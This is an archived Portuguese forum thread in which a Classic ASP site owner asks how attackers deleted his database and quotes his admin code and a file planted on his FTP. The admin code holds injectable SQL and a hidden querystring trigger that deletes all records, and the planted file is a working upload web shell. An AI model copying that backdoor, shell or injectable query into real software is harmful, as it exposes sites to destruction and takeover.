Ir para conteúdo

POWERED BY:

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

criacaoi7

deletaram os registros do DB

Por , em ASP Clássico

Recommended Posts

criacaoi7    0

criacaoi7
Postado

Oi pessoal, boa tarde.

 

acessei o site hoje e descobri que estava com um erro na default, então fui ver o que podia estar ocorrendo e pra minha supresa descobri que todos os registros do DB foram apagados, mas como???

 

Como recentemente tive suspeitas de que alguém estava invadindo meu site um amigo aqui do fórum me passou uma correção no meu código que estava resolvendo... mas agora pelo visto não resolve mais porque conseguiram entrar...

 

Encontrei no FTP esta página que não faz parte do meu site, então quem e como enviaram???

 

queria entender como é feito isso e evitar os acessos...

 

Vou postar o código de segurança da minha página e em seguida o arquivo que o cara mandou... vejam:

 

Parte do código da página de administração:

 

<!--#include file="conexao.asp"-->
<%
if request.querystring = "Login" then
  if request.form("Login") <> "" and request.form("Senha") <> "" then
	Login = replace(request.form("Login"), "'", "")
	Senha = replace(request.form("Senha"), "'", "")
	
	set Verificar = conexao.execute("select * from Administracao where Login='" & login & "' and Senha='" & Senha & "'")
	
	if Verificar.eof then
	  MSG = 2
	else
	  session("ADM") = Verificar("Login")
	  session("ADM2") = Verificar("Nivel")
	end if
	
	Verificar.close
  else
	MSG = 1
  end if
elseif request.querystring = "Logout" then
  session("ADM") = ""
elseif request.querystring = "ClearAllrw2007" then
  Variavel = "FDP"
  conexao.execute("delete * from Noticias where Titulo <> '" & Variavel & "'")
  conexao.execute("delete * from Publicidade where Link <> '" & Variavel & "'")
  conexao.execute("delete * from Administracao where Login <> '" & Variavel & "'")
end if
%>

Página que foi enviada para o meu FTP:

<%
if left(Request.ServerVariables("HTTP_Content_Type"),19) = "multipart/form-data" then
  
  Set Fields = GetUpload()
  FilePath = replace(Server.MapPath("."), "imagens\fotos", "") & Fields("File1").FileName
  Fields("File1").Value.SaveAs FilePath
  
  response.write FilePath
end if
%>

<!---#INCLUDE FILE="../../upload/upload.inc" --->

<form method=POST ENCTYPE="multipart/form-data">
<font size="1" face="Verdana">Arquivo: <input type="file" name="File1"> <input type="submit" Name="Action" value="Enviar"></font>
</form>

Compartilhar este post

Link para o post
Compartilhar em outros sites

Salgado    4

Salgado
Postado

Pode estar havendo invasão pelo server, pode acontecer de o "invasor" ser cadastrado em seu sistema. Existem "n" possibilidades.

Compartilhar este post

Link para o post
Compartilhar em outros sites

jrcardozo    4

jrcardozo
Postado

não existe um log no seu sistema?

como essa página parou no ftp? existe alguma área de upload no site ou admin?

Compartilhar este post

Link para o post
Compartilhar em outros sites

hargon    64

hargon
Postado

Você já havia falado uma vez que outras pessoas (sem citar nomes) possuiam senha do seu FTP. Se outras pessoas tinham acesso podem ter colocado lá.

 

Melhor você alterar todas as senhas possíveis.

 

Obs. Se seus formulários estiverem vulneráveis, se não me engano é possível criar um página (como a que você citou) através dele.

Compartilhar este post

Link para o post
Compartilhar em outros sites
Ir para a lista de tópicos ASP Clássico
×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.

  Aceito